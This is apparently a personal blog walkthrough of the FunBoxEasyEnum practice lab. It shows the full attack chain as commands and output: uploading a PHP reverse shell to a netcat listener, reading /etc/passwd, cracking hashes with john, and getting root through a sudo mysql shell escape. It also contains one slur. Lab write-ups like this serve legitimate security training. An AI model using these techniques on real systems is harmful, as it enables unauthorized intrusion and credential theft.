Offensive Security maintains virtual machines virtual machines you can VPN remote into and start attacking.
It‘s free to sign up to play but you get kicked off after 2 hours.
You can pay $20 a month to spend all day there, learning and attacking. It‘s really fun and interesting.
Anyhow, this is a technical walk through on one called FunBoxEasyEnum.
Imagine that you‘re on a Kali Linux box, VPN-ed into the target network and you scan for the remote host and find it at the 192 address below.
I‘ll share my recon script in another post but it finds all details about the victim computer and I do vulnerability analysis from there. Try it. I learn a lot this way.
Fast and Dirty: (Please excuse me while I troubleshoot why wordpress is retarded on crlf)
- nmap reveals TCP/22 and 80
- Dirb or gobuster reveals mini.php, a file uploader
- edit the php reverse shell in /usr/share/webshells/php/php-reverse-shell.php and replace your ip and port.
- Same with port $port = 4444; // Your netcat listener port
- upload to the 192.168.X.X/mini.php
- open your local netcat listener port with #nc -nlvp 4444
- Upload php-reverse-shell.php at ip/mini.php
- Execute wtih curl: curl 192.168.X.X/php-reverse-shell.php
- Target connects back to you and you have an unpriv-ed shell.
- Pillage /etc/password that has a hash for oracl that cracks to ‘hiphop’. (Not useful but fun)
- Escalate with $sudo /usr/bin/mysql -e ‘\! /bin/sh’
connect to [192.168.49.210] from (UNKNOWN) [192.168.210.132] 40648
Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
12:29:57 up 18 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data
$ hostname
funbox7
From there we must escalate privileges
Misc:
– cat /etc/passwd and there’s a pass hash for oracle?
– #grep oracle passwd >oracle-hash.out
– #john oracle-hash.out and
hiphop (oracle)
– #id uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)
– Sadly not priv account
– Handful of users in /home/harry, sally, goat, oracle and sally
– ls -a shows lots of . files hiddn. inspect those
– ls -l
drwxr-xr-x 2 goat goat 4096 Feb 16 13:25 goat
drwxr-xr-x 2 harry harry 4096 Jan 28 12:03 harry
drwxr-xr-x 2 karla karla 4096 Feb 16 13:23 karla
drwxr-xr-x 2 oracle oracle 4096 Feb 16 13:23 oracle
drwxr-xr-x 2 sally sally 4096 Jan 28 12:03 sally
– Walkthrough recommended ssh goat@192.168.X.X and goat worked as pass!
– goat@funbox7:~$ id goat
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)
uid=1002(sally) gid=1002(sally) groups=1002(sally)
uid=1001(harry) gid=1001(harry) groups=1001(harry)
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)
uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)
– Nobody uid=0 though
$sudo -l
goat@funbox7:~$ sudo -l
Matching Defaults entries for goat on funbox7:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User goat may run the following commands on funbox7:
(root) NOPASSWD: /usr/bin/mysql
root@KaLinux:/home/loki/OSCP/17.FunBoxEasyEnum# john unshadowed.out
Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
goat (goat)
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
123456 (harry)
12345 (oracle)
iubire (sally)
Fancy: ls and show all contents of all subdirs like tree cmd
# ls -as *
Anyhow, escalated privs with $sudo /usr/bin/mysel -e ‘\! /bin/sh’
#whoami
root
wow.